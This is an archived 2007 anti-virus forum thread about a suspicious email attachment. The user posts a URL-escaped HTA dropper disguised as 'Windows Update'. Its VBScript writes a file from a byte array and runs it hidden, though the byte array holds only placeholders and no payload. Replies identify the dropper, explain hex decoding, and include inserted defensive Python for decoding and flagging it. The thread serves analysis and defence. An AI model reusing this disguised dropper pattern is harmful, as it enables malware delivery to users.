can anyone tell me what this is plz?

Discussion in 'Anti-Virus' started by George Orwell, May 2, 2007.

  1. Got this via email today and I can't make out what it is.



    <script>
    <!--
    document.write(unescape("%3CHTML%3E%3CHEAD%3E%0D%0A%3CTITLE%3EWindows%20Update%3C/TITLE%3E%0D%0A%3CHTA%3AAPPLICATION%20ID%3D%22Q%22%20APPLICATIONNAME%3D%22Q%22%20BORDER%3D%22none%22%20BORDERSTYLE%3D%22normal%22%20CAPTION%3D%22no%22%20ICON%3D%22%22%20CONTEXTMENU%3D%22no%22%20MAXIMIZEBUTTON%3D%22no%22%20MINIMIZEBUTTON%3D%22no%22%20SHOWINTASKBAR%3D%22no%22%20SINGLEINSTANCE%3D%22no%22%20SYSMENU%3D%22no%22%20VERSION%3D%221.0%22%20WINDOWSTATE%3D%22minimize%22/%3E%0D%0A%3CSCRIPT%20LANGUAGE%3D%22VBScript%22%3E%0D%0AMyFile%20%3D%20%22%27%2CszHTAVbsName%2C%27%22%0D%0ASet%20FSO%20%3D%20CreateObject%28%22Scripting.FileSystemObject%22%29%0D%0ASet%20TSO%20%3D%20FSO.CreateTextFile%28MyFile%2C%20True%29%0D%0ATSO.write%20%22dim%20filesys%2C%20filetxt%2C%20getname%2C%20path%2C%20textfile%2C%20i%22%20%26%20vbcrlf%0D%0ATSO.write%20%22textfile%20%3D%20%22%22%27%2CszHTAFileName%2C%27%22%22%22%20%26%20vbcrlf%0D%0ATSO.write%20%22Set%20filesys%20%3D%20CreateObject%28%22%22Scripting.FileSystemObject%22%22%29%22%20%26%20vbcrlf%0D%0ATSO.write%20%22Set%20filetxt%20%3D%20filesys.CreateTextFile%28textfile%2C%20True%29%22%20%26%20vbcrlf%0D%0ATSO.write%20%22getname%20%3D%20filesys.GetFileName%28path%29%22%20%26%20vbcrlf%0D%0ATSO.write%20%22dim%20a%22%20%26%20vbcrlf%0D%0ATSO.write%20%22a%3DArray%28%27%2C0%27%29%22%20%26%20vbcrlf%0D%0ATSO.write%20%22for%20i%3D0%20to%20%27%2C0%27%22%20%26%20vbcrlf%0D%0ATSO.write%20%22filetxt.Write%28chr%28a%28i%29%29%29%22%20%26%20vbcrlf%0D%0ATSO.write%20%22next%22%20%26%20vbcrlf%0D%0ATSO.write%20%22filetxt.Close%22%20%26%20vbcrlf%0D%0ATSO.write%20%22dim%20z%22%20%26%20vbcrlf%0D%0ATSO.write%20%22dim%20zz%22%20%26%20vbcrlf%0D%0ATSO.write%20%22Const%20ForReading%20%3D%201%2C%20ForWriting%20%3D%202%2C%20ForAppending%20%3D%203%22%20%26%20vbcrlf%0D%0ATSO.write%20%22const%20RemoteExe%20%3D%20%22%22%27%2CszHTAFileName%2C%27%22%22%22%20%26%20vbcrlf%0D%0ATSO.write%20%22set%20zz%20%3D%20wscript.createobject%28%22%22wscript.shell%22%22%29%22%20%26%20vbcrlf%0D%0ATSO.write%20%22z%20%3D%20zz.run%20%28%22%22%27%2CszHTAFileName%2C%27%22%22%29%22%20%26%20vbcrlf%0D%0ATSO.write%20%22wscript.quit%22%20%26%20vbcrlf%0D%0ASet%20TSO%20%3D%20Nothing%0D%0ASet%20FSO%20%3D%20Nothing%0D%0ADim%20WshShell%0D%0ASet%20WshShell%20%3D%20CreateObject%28%22WScript.Shell%22%29%0D%0AWshShell.Run%20%22%27%2CszHTAVbsName%2C%27%22%2C%200%2C%20false%0D%0A%3C/SCRIPT%3E%0D%0A%3Cscript%3Ewindow.close%28%29%3C/script%3E%0D%0A%3C/HEAD%3E%0D%0A%3C/HTML%3E"));
    //-->
    </script>
     
    George Orwell, May 2, 2007
    #1

  2. Ant (Guest)

    Part of a VBScript HTA exploit with no payload. Where's the rest of it?
     
    Ant, May 2, 2007
    #2

  3. ddcc (Guest)

    How can this be manually "decrypted"?
     
    ddcc, May 3, 2007
    #3
  4. Ant (Guest)

    I don't know why you'd want to do it manually other than for
    educational purposes. Normally you'd write a script or use a suitable
    tool to unescape the hex codes, but here goes.

    Where you see a sequence of characters starting with "%" and
    followed by two more in the range 0-9 or A-F (upper or lower case),
    remove the "%" and treat them as a 2-digit hexadecimal number. This
    number marks the position (0-127) in the ASCII character set where
    the required symbol or control character is found.

    For example:

    %3C is hex 3c, which is position 60 (decimal), which is "<".

    %0D%0A is positions 13 and 10, which represent a carriage-return/
    line-feed pair used to indicate a new line in plain-text documents
    on Microsoft systems and Internet messages.

    So the sequence:

    %3CHTML%3E%3CHEAD%3E%0D%0A%3CTITLE%3E

    Decodes to:

    <HTML><HEAD>
    <TITLE>
     
    Ant, May 3, 2007
    #4
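The decoding Ant walks through above, automated: an added example (not code from any poster in this thread) that replicates JavaScript's unescape() over %XX and %uXXXX sequences, pulls each document.write(unescape("...")) string out of a script block, and flags the HTA and VBScript features a defender would triage in the decoded text. The sample input is constructed from the first fragment of the posted script; the function names are my own.

```python
import re

# JavaScript unescape() turns %XX into the character at that code point
# (0-255) and %uXXXX into one UTF-16 code unit; anything that is not a
# well-formed escape is copied through unchanged, exactly as Ant describes.
_ESC = re.compile(r"%u([0-9A-Fa-f]{4})|%([0-9A-Fa-f]{2})")

def js_unescape(s: str) -> str:
    """Decode a JavaScript-escaped string the way unescape() would."""
    def repl(m):
        hex_digits = m.group(1) or m.group(2)
        return chr(int(hex_digits, 16))
    return _ESC.sub(repl, s)

# Matches the document.write(unescape("...")) wrapper used in the sample.
_WRITE = re.compile(
    r'document\.write\s*\(\s*unescape\s*\(\s*"((?:[^"\\]|\\.)*)"\s*\)\s*\)'
)

def extract_unescape_payloads(html: str) -> list:
    """Return the decoded text of every document.write(unescape(...)) call."""
    return [js_unescape(m.group(1)) for m in _WRITE.finditer(html)]

def hta_indicators(decoded: str) -> dict:
    """Triage flags for the decoded markup: an HTA application block, a
    VBScript section, file-system and shell objects, and a hidden window."""
    u = decoded.upper()
    return {
        "hta_application": "<HTA:APPLICATION" in u,
        "vbscript": 'LANGUAGE="VBSCRIPT"' in u,
        "filesystemobject": "SCRIPTING.FILESYSTEMOBJECT" in u,
        "wscript_shell": "WSCRIPT.SHELL" in u,
        "hidden_window": 'WINDOWSTATE="MINIMIZE"' in u or 'SHOWINTASKBAR="NO"' in u,
    }

# Constructed sample: the opening fragment of the escaped string in post #1.
SAMPLE = ('<script>document.write(unescape("%3CHTML%3E%3CHEAD%3E%0D%0A'
          '%3CTITLE%3EWindows%20Update%3C/TITLE%3E"));</script>')

if __name__ == "__main__":
    for payload in extract_unescape_payloads(SAMPLE):
        print(payload)
        print(hta_indicators(payload))
```

Paste the full escaped string from post #1 into SAMPLE to read the VBScript that the HTA writes out; the flags then show why Ant called it an HTA dropper.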
  5. ddcc (Guest)

    Thanks!
     
    ddcc, May 4, 2007
    #5